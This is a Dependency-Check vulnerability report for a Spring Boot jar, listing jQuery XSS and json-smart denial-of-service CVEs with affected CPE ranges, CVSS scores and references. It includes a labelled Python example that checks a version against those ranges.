cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (including) 8.6.3 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2.0; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.7; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:* versions up to (including) 19.8 cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:* cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:* CVE-2020-11022 suppress
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
Vulnerable Software & Versions (NVD):
CVE-2020-11023
CISA Known Exploited Vulnerability:
Product: JQuery JQuery
Name: JQuery Cross-Site Scripting (XSS) Vulnerability
Date Added: 2025-01-23
Description: JQuery contains a persistent cross-site scripting (XSS) vulnerability. When passing maliciously formed, untrusted input enclosed in HTML tags, JQuery's DOM manipulators can execute untrusted code in the context of the user's browser.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Due Date: 2025-02-13
Notes: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; https://nvd.nist.gov/vuln/detail/CVE-2020-11023
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.0.3; versions up to (excluding) 3.5.0
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:*
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*
cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:cloud_insights_storage_workload_security_agent:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:hci_baseboard_management_controller:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3
cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 20.2
cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0
cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*
cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0
cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.1; versions up to (including) 6.4
cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3
cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:*
cpe:2.3:a:oracle:health_sciences_inform:6.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hyperion_financial_reporting:11.1.2.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0
cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0
cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:* versions up to (excluding) 2.12.41
cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_resources:9.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2; versions up to (including) 16.2.11
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4
cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:*
cpe:2.3:a:oracle:siebel_mobile:*:*:*:*:*:*:*:* versions up to (including) 20.12
cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*
cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9
jquery issue: 162 (RETIREJS)
jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates
Unscored:
References:
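The "Vulnerable Software & Versions (NVD)" entries above are Dependency-Check's rendering of the NVD configuration: a CPE 2.3 string, optionally followed by "versions from (including|excluding) X; versions up to (including|excluding) Y". The question a reader of this report actually has is whether the version they ship falls inside one of those lines. The following Python is an added example, not part of the report and not Dependency-Check's own matching code: it parses a handful of the entry strings copied from the list above and evaluates them against a concrete version, using the jquery 2.1.0 webjar found in this scan as the candidate. The candidate versions are constructed, the zero-padding of shorter versions (so 7.70 equals 7.70.0) and the rule that a CPE with a "-" version field never matches a concrete version are simplifications of this example.

```python
"""Added example (not Dependency-Check code): check the report's
'Vulnerable Software & Versions' lines against a concrete version."""
import re

# Matches "from (including) 1.0.3" and "versions up to (excluding) 3.5.0".
_CLAUSE = re.compile(r"(?:versions )?(from|up to) \((including|excluding)\) (\S+)")

def version_key(v):
    """Sort key for dotted versions: numeric segments compare as integers,
    anything else ('18c', 'RELEASE') as text that sorts after every number."""
    return [(0, int(seg)) if seg.isdigit() else (1, seg) for seg in v.split(".")]

def compare(a, b):
    """-1, 0 or 1; the shorter version is zero-padded so 7.70 == 7.70.0
    (a simplification of this example, not NVD's rule)."""
    ka, kb = version_key(a), version_key(b)
    n = max(len(ka), len(kb))
    ka += [(0, 0)] * (n - len(ka))
    kb += [(0, 0)] * (n - len(kb))
    return (ka > kb) - (ka < kb)

def parse_entry(line):
    """Split one report line into (cpe, lower, upper); each bound is
    (version, inclusive) or None when the line carries no such clause."""
    cpe, _, rest = line.partition(" versions ")
    lo = hi = None
    for clause in rest.split(";"):
        m = _CLAUSE.match(clause.strip())
        if m:
            bound = (m.group(3), m.group(2) == "including")
            if m.group(1) == "from":
                lo = bound
            else:
                hi = bound
    return cpe, lo, hi

def in_range(version, lo, hi):
    if lo is not None:
        c = compare(version, lo[0])
        if c < 0 or (c == 0 and not lo[1]):
            return False
    if hi is not None:
        c = compare(version, hi[0])
        if c > 0 or (c == 0 and not hi[1]):
            return False
    return True

def entry_matches(line, vendor, product, version):
    """True when the entry covers vendor/product at exactly `version`.
    Assumption of this example: a CPE whose version field is '-' (no
    version recorded) does not match any concrete version."""
    cpe, lo, hi = parse_entry(line)
    fields = cpe.split(":")  # cpe:2.3:part:vendor:product:version:...
    if (fields[3], fields[4]) != (vendor, product):
        return False
    if fields[5] == "*":
        return in_range(version, lo, hi)
    if fields[5] == "-":
        return False
    return compare(version, fields[5]) == 0

def matching_entries(lines, vendor, product, version):
    return [line for line in lines if entry_matches(line, vendor, product, version)]

# Entry strings copied from the report's list; the candidate versions are constructed.
REPORT_ENTRIES = [
    "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.0.3; versions up to (excluding) 3.5.0",
    "cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3",
    "cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:*",
    "cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 20.2",
    "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*",
]

if __name__ == "__main__":
    # jquery-2.1.0-2.jar is the webjar this report found inside the Spring Boot jar.
    for line in matching_entries(REPORT_ENTRIES, "jquery", "jquery", "2.1.0"):
        print("jquery 2.1.0 is covered by:", line)
    for cand in ("3.4.1", "3.5.0"):
        hit = matching_entries(REPORT_ENTRIES, "jquery", "jquery", cand)
        print("jquery", cand, "matches" if hit else "does not match")
```

The exclusive upper bound is the detail that matters in practice: jquery 3.4.1 is still inside the range while 3.5.0, the fixed release named in the jQuery blog post above, is not. Dependency-Check performs this matching itself during the scan; the point of re-doing it on the rendered lines is to confirm, for a specific artifact, which report entries actually apply before deciding between an upgrade and a suppression.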
spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jar: webjars-requirejs.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar/META-INF/resources/webjars/jquery/2.1.0/webjars-requirejs.js
MD5: 30e1a7f167b667001f50e32ea87bf7b5
SHA1: d18dc733350ad3549af2df096599e824c10f777e
SHA256: daca7b23bc4d8302a8961373b92b78d36d5c85d730fc14130e29d55d976aa420
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: json-smart-1.3.1.jar
Description:
JSON (JavaScript Object Notation) is a lightweight data-interchange format.
It is easy for humans to read and write. It is easy for machines to parse and generate.
It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition
- December 1999. JSON is a text format that is completely language independent but uses
conventions that are familiar to programmers of the C-family of languages, including C, C++, C#,
Java, JavaScript, Perl, Python, and many others.
These properties make JSON an ideal data-interchange language.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/json-smart-1.3.1.jar
MD5: b4f09b247c03cc2d091502d5b1db1f7f
SHA1: 69b3835e96d282ec85fc2e1517b8164c45ed639e
SHA256: ac3689112788e042088755e63ecd1f689adfeb04d7fb1cfd244513f94f82522c
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | json-smart | High
Vendor | jar | package name | json | Highest
Vendor | jar | package name | minidev | Highest
Vendor | jar | package name | net | Highest
Vendor | jar | package name | parser | Highest
Vendor | Manifest | bundle-docurl | http://www.minidev.net/ | Low
Vendor | Manifest | bundle-symbolicname | net.minidev.json-smart | Medium
Vendor | pom | artifactid | json-smart | Low
Vendor | pom | groupid | net.minidev | Highest
Vendor | pom | name | JSON Small and Fast Parser | High
Vendor | pom | parent-artifactid | parent | Low
Product | file | name | json-smart | High
Product | jar | package name | json | Highest
Product | jar | package name | minidev | Highest
Product | jar | package name | net | Highest
Product | jar | package name | parser | Highest
Product | Manifest | bundle-docurl | http://www.minidev.net/ | Low
Product | Manifest | Bundle-Name | json-smart | Medium
Product | Manifest | bundle-symbolicname | net.minidev.json-smart | Medium
Product | pom | artifactid | json-smart | Highest
Product | pom | groupid | net.minidev | Highest
Product | pom | name | JSON Small and Fast Parser | High
Product | pom | parent-artifactid | parent | Medium
Version | file | version | 1.3.1 | High
Version | Manifest | Bundle-Version | 1.3.1 | High
Version | pom | version | 1.3.1 | Highest
CVE-2021-31684
A vulnerability was discovered in the indexOf function of JSONParserByteArray in JSON Smart versions 1.3 and 2.4 which causes a denial of service (DOS) via a crafted web request.
CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
OSSINDEX - [CVE-2021-31684] CWE-787: Out-of-bounds Write
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31684
OSSIndex - https://github.com/netplex/json-smart-v1/issues/10
OSSIndex - https://github.com/netplex/json-smart-v1/pull/11
OSSIndex - https://github.com/netplex/json-smart-v2/issues/67
OSSIndex - https://github.com/netplex/json-smart-v2/pull/68
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY
cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY
cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY
cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY
cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
CVE-2023-1370
[Json-smart](https://netplex.github.io/json-smart/) is a performance focused, JSON processor lib.
When reaching a ‘[‘ or ‘{‘ character in the JSON input, the code parses an array or an object respectively.
It was discovered that the code does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause a stack exhaustion (stack overflow) and crash the software.
CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2021-27568
An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information.
CWE-754 Improper Check for Unusual or Exceptional Conditions
CVSSv3:
Base Score: MEDIUM (5.9)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
OSSINDEX - [CVE-2021-27568] CWE-754: Improper Check for Unusual or Exceptional Conditions
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27568
OSSIndex - https://github.com/netplex/json-smart-v1/issues/7
OSSIndex - https://github.com/netplex/json-smart-v1/pull/8
OSSIndex - https://github.com/netplex/json-smart-v2/issues/60
OSSIndex - https://github.com/netplex/json-smart-v2/pull/61
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY
